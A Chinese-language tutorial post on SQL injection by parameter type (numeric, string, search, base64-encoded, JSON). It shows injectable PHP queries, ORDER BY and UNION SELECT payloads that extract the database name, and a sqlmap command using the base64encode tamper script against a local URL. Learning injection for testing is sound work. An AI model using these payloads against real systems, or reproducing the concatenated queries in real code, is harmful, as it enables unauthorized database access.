本文主要是介绍sql 数据类型注入+tamper,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
数字型 0-9
查询语句:
$sql="select * from sy_guestbook where id=$i";字符型 a-z 中文 标点符号 加入了单引号
查询语句:
$sql="select * from sy_guestbook where gTpl='$g'";simple' order by 16--+select * from sy_guestbook where gTpl='simple' order by 16--+'
搜索型 在基础上又加入的通配符
查询语句:
$sql="select * from sy_guestbook where gName like '%s%
演示%' UNION+ALL+SELECT+1,datab,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 and %'=select * from sy guestbook where gName like %演示%' UNION+ALL+SELECT+1,database(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 and '%'='%' 编码型 数据以编码值传递
查询语句:
$param = base64_decode($_GET['param']);$sql = "SELECT * FROM users WHERE id = '$param'"加密型 数据以加密的密文去发送
格式型 JSON
数据进行编码接受处理:发送编码值,对方常会进行解码后带入数据在进行SQL执行在注入的时候,我们也要尝试对注入的Payload进行编码后提交
分为键名和键值,类似py的字典。
这个需要注意的就是单引号的闭合,双引号是不作为值传入到源码里面进行处理的,从源码里面我们也可以知道只需要闭合单引号即可,至于{}这个符号,是josn自带的,这个不用考虑。
总结:
(开发程序里面,数字不需要单引号,字符需要单引号 双引号去概括的
需要考虑到符号的闭合 才能正确去执行SQL 完成SQL注入)
我在本地尝试了编码型base64
?param=MQ==
tamper
因为进行了base64编码,sqlmap直接跑是跑不出的
因为我们人知道这是base64,但是他不知道
那么!!!
这个时候就可以用到!!!
tamper!!!
Sqlmap的脚本都在tamper目录下
sqlmap.py -u "http://localhost/?param=MQ==" --tamper=base64encode.py
好的已经见识到tamper的魅力了
这篇关于sql 数据类型注入+tamper的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!
